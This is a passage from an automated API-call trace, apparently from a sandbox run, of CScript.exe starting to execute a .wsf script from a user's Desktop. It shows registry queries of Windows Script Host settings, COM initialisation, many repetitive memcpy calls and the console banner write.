\"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" ") returned 0x0 [0098.312] wcscpy_s (in: _Destination=0xd6788ffc60, _SizeInWords=0x50, _Source="C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" " | out: _Destination="C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" ") returned 0x0 [0098.312] wcscpy_s (in: _Destination=0xd6788ffc9e, _SizeInWords=0x30, _Source=" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" " | out: _Destination=" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" ") returned 0x0 [0098.312] wcscpy_s (in: _Destination=0xd6788ffca2, _SizeInWords=0x2d, _Source="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" " | out: _Destination="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" ") returned 0x0 [0098.312] wcscpy_s (in: _Destination=0xd6788ffcf4, _SizeInWords=0x3, _Source=" " | out: _Destination=" ") returned 0x0 [0098.313] GetCurrentThreadId () returned 0xcf4 [0098.313] CoInitialize (pvReserved=0x0) returned 0x0 [0098.537] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788ff8d8 | out: phkResult=0xd6788ff8d8*=0xec) returned 0x0 [0098.540] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788ff8d0 | out: phkResult=0xd6788ff8d0*=0xf0) returned 0x0 [0098.540] RegQueryValueExW (in: hKey=0xf0, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0xd6788febc4, lpData=0xd6788fefd0, lpcbData=0xd6788febc0*=0x400 | out: lpType=0xd6788febc4*=0x0, lpData=0xd6788fefd0*=0x0, lpcbData=0xd6788febc0*=0x400) returned 0x2 [0098.540] RegQueryValueExW (in: hKey=0xec, lpValueName="Enabled", lpReserved=0x0, lpType=0xd6788febc4, lpData=0xd6788fefd0, lpcbData=0xd6788febc0*=0x400 | out: lpType=0xd6788febc4*=0x0, lpData=0xd6788fefd0*=0x0, lpcbData=0xd6788febc0*=0x400) returned 0x2 [0098.541] RegQueryValueExW (in: hKey=0xf0, lpValueName="Enabled", lpReserved=0x0, lpType=0xd6788febc4, lpData=0xd6788fefd0, lpcbData=0xd6788febc0*=0x400 | out: lpType=0xd6788febc4*=0x0, lpData=0xd6788fefd0*=0x0, lpcbData=0xd6788febc0*=0x400) returned 0x2 [0098.541] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0098.560] RegCloseKey (hKey=0xf0) returned 0x0 [0098.560] RegCloseKey (hKey=0xec) returned 0x0 [0098.560] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788ff5f0 | out: phkResult=0xd6788ff5f0*=0xec) returned 0x0 [0098.560] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788ff5e8 | out: phkResult=0xd6788ff5e8*=0xf0) returned 0x0 [0098.560] RegQueryValueExW (in: hKey=0xf0, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0xd6788fe8e4, lpData=0xd6788fecf0, lpcbData=0xd6788fe8e0*=0x400 | out: lpType=0xd6788fe8e4*=0x0, lpData=0xd6788fecf0*=0x40, lpcbData=0xd6788fe8e0*=0x400) returned 0x2 [0098.560] RegQueryValueExW (in: hKey=0xec, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0xd6788fe8e4, lpData=0xd6788fecf0, lpcbData=0xd6788fe8e0*=0x400 | out: lpType=0xd6788fe8e4*=0x0, lpData=0xd6788fecf0*=0x40, lpcbData=0xd6788fe8e0*=0x400) returned 0x2 [0098.561] RegQueryValueExW (in: hKey=0xf0, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0xd6788fe8e4, lpData=0xd6788fecf0, lpcbData=0xd6788fe8e0*=0x400 | out: lpType=0xd6788fe8e4*=0x0, lpData=0xd6788fecf0*=0x40, lpcbData=0xd6788fe8e0*=0x400) returned 0x2 [0098.561] RegCloseKey (hKey=0xf0) returned 0x0 [0098.561] RegCloseKey (hKey=0xec) returned 0x0 [0098.561] GetACP () returned 0x4e4 [0098.561] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ff871bc0000 [0098.561] GetProcAddress (hModule=0x7ff871bc0000, lpProcName="HeapSetInformation") returned 0x7ff871be7430 [0098.561] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.562] FreeLibrary (hLibModule=0x7ff871bc0000) returned 1 [0098.562] malloc (_Size=0x20) returned 0x24adfc658e0 [0098.562] CoRegisterMessageFilter (in: lpMessageFilter=0x24adfc658e0, lplpMessageFilter=0x24adfc658f0 | out: lplpMessageFilter=0x24adfc658f0*=0x0) returned 0x0 [0098.562] IUnknown:AddRef (This=0x24adfc658e0) returned 0x2 [0098.562] GetModuleFileNameW (in: hModule=0x7ff7889d0000, lpFilename=0xd6788ff950, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0098.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0xd6788ff270 | out: lpdwHandle=0xd6788ff270) returned 0x6f4 [0098.563] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x6f4, lpData=0xd6788feb70 | out: lpData=0xd6788feb70) returned 1 [0098.564] VerQueryValueW (in: pBlock=0xd6788feb70, lpSubBlock="\\", lplpBuffer=0xd6788ff278, puLen=0xd6788ff274 | out: lplpBuffer=0xd6788ff278*=0xd6788feb98, puLen=0xd6788ff274) returned 1 [0098.564] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788ff2c8 | out: phkResult=0xd6788ff2c8*=0xec) returned 0x0 [0098.564] RegQueryValueExW (in: hKey=0xec, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0xd6788fe604, lpData=0xd6788fea10, lpcbData=0xd6788fe600*=0x400 | out: lpType=0xd6788fe604*=0x0, lpData=0xd6788fea10*=0x0, lpcbData=0xd6788fe600*=0x400) returned 0x2 [0098.564] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788ff280 | out: phkResult=0xd6788ff280*=0xf0) returned 0x0 [0098.564] RegQueryValueExW (in: hKey=0xf0, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0xd6788ff234, lpData=0xd6788ff2c0, lpcbData=0xd6788ff230*=0x4 | out: lpType=0xd6788ff234*=0x0, lpData=0xd6788ff2c0*=0x1, lpcbData=0xd6788ff230*=0x4) returned 0x2 [0098.564] RegQueryValueExW (in: hKey=0xf0, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0xd6788fe604, lpData=0xd6788fea10, lpcbData=0xd6788fe600*=0x400 | out: lpType=0xd6788fe604*=0x0, lpData=0xd6788fea10*=0x0, lpcbData=0xd6788fe600*=0x400) returned 0x2 [0098.564] RegQueryValueExW (in: hKey=0xec, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0xd6788ff234, lpData=0xd6788ff2c0, lpcbData=0xd6788ff230*=0x4 | out: lpType=0xd6788ff234*=0x0, lpData=0xd6788ff2c0*=0x1, lpcbData=0xd6788ff230*=0x4) returned 0x2 [0098.564] RegQueryValueExW (in: hKey=0xec, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0xd6788fe604, lpData=0xd6788fea10, lpcbData=0xd6788fe600*=0x400 | out: lpType=0xd6788fe604*=0x1, lpData="1", lpcbData=0xd6788fe600*=0x4) returned 0x0 [0098.564] RegCloseKey (hKey=0xf0) returned 0x0 [0098.564] RegCloseKey (hKey=0xec) returned 0x0 [0098.564] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xd600020019, lpSecurityAttributes=0x0, phkResult=0xd6788ff2c8, lpdwDisposition=0x0 | out: phkResult=0xd6788ff2c8*=0xec, lpdwDisposition=0x0) returned 0x0 [0098.565] RegQueryValueExW (in: hKey=0xec, lpValueName="Timeout", lpReserved=0x0, lpType=0xd6788ff254, lpData=0xd6788ff2c0, lpcbData=0xd6788ff250*=0x4 | out: lpType=0xd6788ff254*=0x0, lpData=0xd6788ff2c0*=0x1, lpcbData=0xd6788ff250*=0x4) returned 0x2 [0098.565] RegQueryValueExW (in: hKey=0xec, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0xd6788fe624, lpData=0xd6788fea30, lpcbData=0xd6788fe620*=0x400 | out: lpType=0xd6788fe624*=0x1, lpData="1", lpcbData=0xd6788fe620*=0x4) returned 0x0 [0098.565] RegCloseKey (hKey=0xec) returned 0x0 [0098.565] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x7ff800020019, lpSecurityAttributes=0x0, phkResult=0xd6788ff2c8, lpdwDisposition=0x0 | out: phkResult=0xd6788ff2c8*=0xec, lpdwDisposition=0x0) returned 0x0 [0098.565] RegQueryValueExW (in: hKey=0xec, lpValueName="Timeout", lpReserved=0x0, lpType=0xd6788ff254, lpData=0xd6788ff2c0, lpcbData=0xd6788ff250*=0x4 | out: lpType=0xd6788ff254*=0x0, lpData=0xd6788ff2c0*=0x1, lpcbData=0xd6788ff250*=0x4) returned 0x2 [0098.565] RegQueryValueExW (in: hKey=0xec, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0xd6788fe624, lpData=0xd6788fea30, lpcbData=0xd6788fe620*=0x400 | out: lpType=0xd6788fe624*=0x0, lpData=0xd6788fea30*=0x31, lpcbData=0xd6788fe620*=0x400) returned 0x2 [0098.565] RegCloseKey (hKey=0xec) returned 0x0 [0098.565] wcscpy_s (in: _Destination=0xd6788ff54c, _SizeInWords=0x104, _Source="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf" | out: _Destination="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf") returned 0x0 [0098.565] LoadStringW (in: hInstance=0x7ff7889d0000, uID=0x834, lpBuffer=0xd6788fe1c0, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70 [0098.566] FormatMessageW (in: dwFlags=0x500, lpSource=0x24adf989768, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xd6788ff1a8, nSize=0x0, Arguments=0xd6788ff218 | out: lpBuffer="ꍀ\䫟∂) returned 0x6c [0098.567] LocalFree (hMem=0x24adf98a340) returned 0x0 [0098.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2c [0098.567] GetProcessHeap () returned 0x24adf970000 [0098.567] RtlAllocateHeap (HeapHandle=0x24adf970000, Flags=0x0, Size=0xec) returned 0x24adf989d10 [0098.567] memcpy (in: _Dst=0x24adf989d10, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d10) returned 0x24adf989d10 [0098.567] memcpy (in: _Dst=0x24adf989d12, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d12) returned 0x24adf989d12 [0098.567] memcpy (in: _Dst=0x24adf989d14, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d14) returned 0x24adf989d14 [0098.567] memcpy (in: _Dst=0x24adf989d16, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d16) returned 0x24adf989d16 [0098.567] memcpy (in: _Dst=0x24adf989d18, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d18) returned 0x24adf989d18 [0098.567] memcpy (in: _Dst=0x24adf989d1a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d1a) returned 0x24adf989d1a [0098.567] memcpy (in: _Dst=0x24adf989d1c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d1c) returned 0x24adf989d1c [0098.567] memcpy (in: _Dst=0x24adf989d1e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d1e) returned 0x24adf989d1e [0098.567] memcpy (in: _Dst=0x24adf989d20, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d20) returned 0x24adf989d20 [0098.567] memcpy (in: _Dst=0x24adf989d22, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d22) returned 0x24adf989d22 [0098.567] memcpy (in: _Dst=0x24adf989d24, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d24) returned 0x24adf989d24 [0098.567] memcpy (in: _Dst=0x24adf989d26, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d26) returned 0x24adf989d26 [0098.567] memcpy (in: _Dst=0x24adf989d28, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d28) returned 0x24adf989d28 [0098.567] memcpy (in: _Dst=0x24adf989d2a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d2a) returned 0x24adf989d2a [0098.567] memcpy (in: _Dst=0x24adf989d2c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d2c) returned 0x24adf989d2c [0098.567] memcpy (in: _Dst=0x24adf989d2e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d2e) returned 0x24adf989d2e [0098.567] memcpy (in: _Dst=0x24adf989d30, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d30) returned 0x24adf989d30 [0098.568] memcpy (in: _Dst=0x24adf989d32, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d32) returned 0x24adf989d32 [0098.568] memcpy (in: _Dst=0x24adf989d34, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d34) returned 0x24adf989d34 [0098.568] memcpy (in: _Dst=0x24adf989d36, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d36) returned 0x24adf989d36 [0098.568] memcpy (in: _Dst=0x24adf989d38, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d38) returned 0x24adf989d38 [0098.568] memcpy (in: _Dst=0x24adf989d3a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d3a) returned 0x24adf989d3a [0098.568] memcpy (in: _Dst=0x24adf989d3c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d3c) returned 0x24adf989d3c [0098.568] memcpy (in: _Dst=0x24adf989d3e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d3e) returned 0x24adf989d3e [0098.568] memcpy (in: _Dst=0x24adf989d40, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d40) returned 0x24adf989d40 [0098.568] memcpy (in: _Dst=0x24adf989d42, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d42) returned 0x24adf989d42 [0098.568] memcpy (in: _Dst=0x24adf989d44, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d44) returned 0x24adf989d44 [0098.568] memcpy (in: _Dst=0x24adf989d46, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d46) returned 0x24adf989d46 [0098.568] memcpy (in: _Dst=0x24adf989d48, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d48) returned 0x24adf989d48 [0098.568] memcpy (in: _Dst=0x24adf989d4a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d4a) returned 0x24adf989d4a [0098.568] memcpy (in: _Dst=0x24adf989d4c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d4c) returned 0x24adf989d4c [0098.568] memcpy (in: _Dst=0x24adf989d4e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d4e) returned 0x24adf989d4e [0098.568] memcpy (in: _Dst=0x24adf989d50, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d50) returned 0x24adf989d50 [0098.568] memcpy (in: _Dst=0x24adf989d52, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d52) returned 0x24adf989d52 [0098.568] memcpy (in: _Dst=0x24adf989d54, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d54) returned 0x24adf989d54 [0098.568] memcpy (in: _Dst=0x24adf989d56, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d56) returned 0x24adf989d56 [0098.568] memcpy (in: _Dst=0x24adf989d58, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d58) returned 0x24adf989d58 [0098.569] memcpy (in: _Dst=0x24adf989d5a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d5a) returned 0x24adf989d5a [0098.569] memcpy (in: _Dst=0x24adf989d5c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d5c) returned 0x24adf989d5c [0098.569] memcpy (in: _Dst=0x24adf989d5e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d5e) returned 0x24adf989d5e [0098.569] memcpy (in: _Dst=0x24adf989d60, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d60) returned 0x24adf989d60 [0098.569] memcpy (in: _Dst=0x24adf989d62, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d62) returned 0x24adf989d62 [0098.569] memcpy (in: _Dst=0x24adf989d64, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d64) returned 0x24adf989d64 [0098.569] memcpy (in: _Dst=0x24adf989d66, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d66) returned 0x24adf989d66 [0098.569] memcpy (in: _Dst=0x24adf989d68, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d68) returned 0x24adf989d68 [0098.569] memcpy (in: _Dst=0x24adf989d6a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d6a) returned 0x24adf989d6a [0098.569] memcpy (in: _Dst=0x24adf989d6c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d6c) returned 0x24adf989d6c [0098.569] memcpy (in: _Dst=0x24adf989d6e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d6e) returned 0x24adf989d6e [0098.569] memcpy (in: _Dst=0x24adf989d70, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d70) returned 0x24adf989d70 [0098.569] memcpy (in: _Dst=0x24adf989d72, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d72) returned 0x24adf989d72 [0098.569] memcpy (in: _Dst=0x24adf989d74, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d74) returned 0x24adf989d74 [0098.569] memcpy (in: _Dst=0x24adf989d76, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d76) returned 0x24adf989d76 [0098.569] memcpy (in: _Dst=0x24adf989d78, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d78) returned 0x24adf989d78 [0098.569] memcpy (in: _Dst=0x24adf989d7a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d7a) returned 0x24adf989d7a [0098.569] memcpy (in: _Dst=0x24adf989d7c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d7c) returned 0x24adf989d7c [0098.569] memcpy (in: _Dst=0x24adf989d7e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d7e) returned 0x24adf989d7e [0098.570] memcpy (in: _Dst=0x24adf989d80, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d80) returned 0x24adf989d80 [0098.570] memcpy (in: _Dst=0x24adf989d82, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d82) returned 0x24adf989d82 [0098.570] memcpy (in: _Dst=0x24adf989d84, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d84) returned 0x24adf989d84 [0098.570] memcpy (in: _Dst=0x24adf989d86, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d86) returned 0x24adf989d86 [0098.570] memcpy (in: _Dst=0x24adf989d88, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d88) returned 0x24adf989d88 [0098.570] memcpy (in: _Dst=0x24adf989d8a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d8a) returned 0x24adf989d8a [0098.570] memcpy (in: _Dst=0x24adf989d8c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d8c) returned 0x24adf989d8c [0098.570] memcpy (in: _Dst=0x24adf989d8e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d8e) returned 0x24adf989d8e [0098.570] memcpy (in: _Dst=0x24adf989d90, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d90) returned 0x24adf989d90 [0098.570] memcpy (in: _Dst=0x24adf989d92, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d92) returned 0x24adf989d92 [0098.570] memcpy (in: _Dst=0x24adf989d94, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d94) returned 0x24adf989d94 [0098.570] memcpy (in: _Dst=0x24adf989d96, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d96) returned 0x24adf989d96 [0098.570] memcpy (in: _Dst=0x24adf989d98, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d98) returned 0x24adf989d98 [0098.570] memcpy (in: _Dst=0x24adf989d9a, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d9a) returned 0x24adf989d9a [0098.570] memcpy (in: _Dst=0x24adf989d9c, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d9c) returned 0x24adf989d9c [0098.570] memcpy (in: _Dst=0x24adf989d9e, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989d9e) returned 0x24adf989d9e [0098.570] memcpy (in: _Dst=0x24adf989da0, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989da0) returned 0x24adf989da0 [0098.570] memcpy (in: _Dst=0x24adf989da2, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989da2) returned 0x24adf989da2 [0098.570] memcpy (in: _Dst=0x24adf989da4, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989da4) returned 0x24adf989da4 [0098.570] memcpy (in: _Dst=0x24adf989da6, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989da6) returned 0x24adf989da6 [0098.570] memcpy (in: _Dst=0x24adf989da8, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989da8) returned 0x24adf989da8 [0098.570] memcpy (in: _Dst=0x24adf989daa, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989daa) returned 0x24adf989daa [0098.571] memcpy (in: _Dst=0x24adf989dac, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dac) returned 0x24adf989dac [0098.571] memcpy (in: _Dst=0x24adf989dae, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dae) returned 0x24adf989dae [0098.571] memcpy (in: _Dst=0x24adf989db0, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989db0) returned 0x24adf989db0 [0098.571] memcpy (in: _Dst=0x24adf989db2, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989db2) returned 0x24adf989db2 [0098.571] memcpy (in: _Dst=0x24adf989db4, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989db4) returned 0x24adf989db4 [0098.571] memcpy (in: _Dst=0x24adf989db6, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989db6) returned 0x24adf989db6 [0098.571] memcpy (in: _Dst=0x24adf989db8, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989db8) returned 0x24adf989db8 [0098.571] memcpy (in: _Dst=0x24adf989dba, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dba) returned 0x24adf989dba [0098.571] memcpy (in: _Dst=0x24adf989dbc, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dbc) returned 0x24adf989dbc [0098.571] memcpy (in: _Dst=0x24adf989dbe, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dbe) returned 0x24adf989dbe [0098.571] memcpy (in: _Dst=0x24adf989dc0, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dc0) returned 0x24adf989dc0 [0098.571] memcpy (in: _Dst=0x24adf989dc2, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dc2) returned 0x24adf989dc2 [0098.571] memcpy (in: _Dst=0x24adf989dc4, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dc4) returned 0x24adf989dc4 [0098.571] memcpy (in: _Dst=0x24adf989dc6, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dc6) returned 0x24adf989dc6 [0098.571] memcpy (in: _Dst=0x24adf989dc8, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dc8) returned 0x24adf989dc8 [0098.571] memcpy (in: _Dst=0x24adf989dca, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dca) returned 0x24adf989dca [0098.571] memcpy (in: _Dst=0x24adf989dcc, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dcc) returned 0x24adf989dcc [0098.571] memcpy (in: _Dst=0x24adf989dce, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dce) returned 0x24adf989dce [0098.571] memcpy (in: _Dst=0x24adf989dd0, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dd0) returned 0x24adf989dd0 [0098.571] memcpy (in: _Dst=0x24adf989dd2, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dd2) returned 0x24adf989dd2 [0098.571] memcpy (in: _Dst=0x24adf989dd4, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dd4) returned 0x24adf989dd4 [0098.572] memcpy (in: _Dst=0x24adf989dd6, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dd6) returned 0x24adf989dd6 [0098.572] memcpy (in: _Dst=0x24adf989dd8, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dd8) returned 0x24adf989dd8 [0098.572] memcpy (in: _Dst=0x24adf989dda, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dda) returned 0x24adf989dda [0098.572] memcpy (in: _Dst=0x24adf989ddc, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989ddc) returned 0x24adf989ddc [0098.572] memcpy (in: _Dst=0x24adf989dde, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dde) returned 0x24adf989dde [0098.572] memcpy (in: _Dst=0x24adf989de0, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989de0) returned 0x24adf989de0 [0098.572] memcpy (in: _Dst=0x24adf989de2, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989de2) returned 0x24adf989de2 [0098.572] memcpy (in: _Dst=0x24adf989de4, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989de4) returned 0x24adf989de4 [0098.572] memcpy (in: _Dst=0x24adf989de6, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989de6) returned 0x24adf989de6 [0098.572] memcpy (in: _Dst=0x24adf989de8, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989de8) returned 0x24adf989de8 [0098.572] memcpy (in: _Dst=0x24adf989dea, _Src=0xd6788fef60, _Size=0x2 | out: _Dst=0x24adf989dea) returned 0x24adf989dea [0098.572] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xd6788fef60 | out: lpMode=0xd6788fef60) returned 1 [0098.577] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x24adf989d10*, nNumberOfCharsToWrite=0x6e, lpNumberOfCharsWritten=0xd6788fef68, lpReserved=0x0 | out: lpBuffer=0x24adf989d10*, lpNumberOfCharsWritten=0xd6788fef68*=0x6e) returned 1 [0098.585] GetProcessHeap () returned 0x24adf970000 [0098.585] HeapFree (in: hHeap=0x24adf970000, dwFlags=0x0, lpMem=0x24adf989d10 | out: hHeap=0x24adf970000) returned 1 [0098.585] malloc (_Size=0x88) returned 0x24adfc65910 [0098.586] memcpy (in: _Dst=0xd6788fed30, 